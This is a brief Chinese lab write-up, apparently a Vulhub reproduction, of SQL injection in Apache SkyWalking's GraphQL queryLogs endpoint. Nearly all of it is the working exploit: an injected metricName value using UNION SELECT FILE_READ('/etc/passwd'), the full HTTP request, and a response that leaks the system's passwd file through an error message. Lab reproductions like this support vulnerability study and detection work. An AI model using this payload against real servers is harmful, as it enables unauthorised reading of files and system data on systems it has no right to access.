【vluhub】skywalking

SkyWalking是一个开源监控平台，用于从服务和云原生基础设施收集、分析、聚合和可视化数据

低版本存在sql注入漏洞

访问地址

http://192.168.203.12:8080/graphql

burpsuite抓数据包

替换

{"query":"query queryLogs($condition: LogQueryCondition) {\n    queryLogs(condition: $condition) {\n        logs{\n    content    }\n  }}","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS) union SELECT FILE_READ('/etc/passwd', NULL) where ?=1 or ?=1 or 1=1--","paging":{"pageNum":1,"pageSize":1},"state":ALL, "queryDuration":{"start":"2021-02-07 1554","end":"2021-02-07 1554","step":"MINUTE"}}}}

POST /graphql HTTP/1.1
Host: 192.168.203.12:8080
Content-Length: 413
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.203.12:8080
Referer: http://192.168.203.12:8080/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive{"query":"query queryLogs($condition: LogQueryCondition) {\n    queryLogs(condition: $condition) {\n        logs{\n    content    }\n  }}","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS) union SELECT FILE_READ('/etc/passwd', NULL) where ?=1 or ?=1 or 1=1--","paging":{"pageNum":1,"pageSize":1},"state":ALL, "queryDuration":{"start":"2021-02-07 1554","end":"2021-02-07 1554","step":"MINUTE"}}}}

response

HTTP/1.1 200 
X-Application-Context: application:8080
Date: Thu, 01 Aug 2024 07:51:24 GMT
Content-Type: application/json;charset=utf-8
Content-Length: 1287{"data":{},"errors":[{"message":"Exception while fetching data (/queryLogs) : Data conversion error converting \"root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n\"; SQL statement:\nselect count(1) total from (select 1 from INFORMATION_SCHEMA.USERS) union SELECT FILE_READ('/etc/passwd', NULL) where ?=1 or ?=1 or 1=1-- where  1=1  and time_bucket >= ? and time_bucket <= ? ) [22018-196]"}]}

参考

Apache Skywalking ＜= 8.3 SQL注入(漏洞分析|snort规则编写)-CSDN博客